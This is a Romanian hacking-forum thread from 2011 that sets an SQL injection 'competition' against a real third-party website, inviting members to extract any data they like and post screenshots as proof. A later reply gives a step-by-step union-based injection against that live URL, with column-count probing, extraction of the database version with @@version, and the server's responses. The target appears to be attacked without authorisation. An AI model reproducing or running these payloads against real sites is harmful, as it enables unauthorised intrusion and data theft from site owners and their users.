[Easy/Medium] SQL Injection

vlad1395 · April 30, 2011

O noua competitie, care sper ca o sa va placa.

- Sintaxele nu se vor face publice, se vor trimite prin PM !

- Postati aici doar un screen-shot ca dovada ca ati rezolvat (fara a se vedea rezolvarea)

Cerere: Extrageti ce vreti.

Dificultate: Usor

Metoda: MySQL Union Based, Error Based

http://www.lindell.fi/?id=49

SURSA: HF

Proofs:

Solvers

daemien

ghostwhite85

Edited May 1, 2011 by vlad1395

vlad1395 · May 1, 2011

A? vrea s? ?tiu dac? a încercat cineva ?i dac? sunte?i interesa?i de astfel de competi?ii.

ghostwhite85 · May 1, 2011

E permis si double query?

vlad1395 · May 1, 2011

la aceasta competie, DA. am scris in descriere:

" Metoda: MySQL Union Based, Error Based "

------------------------------------------------

Este foarte usoara, dar poate unora vi se poate parea interesanta, mai ales cu DQ

ghostwhite85 · May 1, 2011

vlad1395 · May 1, 2011

acum am observat ca mergea in mai multe feluri si cu DQ. Oricum felicitari.

Sega · September 6, 2011

30/04/2011 data postarii challenge-ului

O modalitate de aflare a versiunii:

1)

 http://www.lindell.fi/?id=-49 'union select 1,

MySQL Error: 1222 (The used SELECT statements have a different number of columns)

2)

 http://www.lindell.fi/?id=-49 'union select 1,2'

...

La fel pana cand eroare dispare (la 9)

9)

http://www.lindell.fi/?id=-49 'union select 1,2,3,4,5,6,7,8,9'

The requested URL /7 was not found on this server.

Ne zice ce coloana se afiseaza si anume 7.

Inlocuim 7 cu @@version.

http://www.lindell.fi/?id=-49 'union select 1,2,3,4,5,6,@@version,8,9'


The requested URL /5.0.22-log was not found on this server.
Apache/2.2.3 (CentOS) Server at www.lindell.fi Port 80

Recommended Posts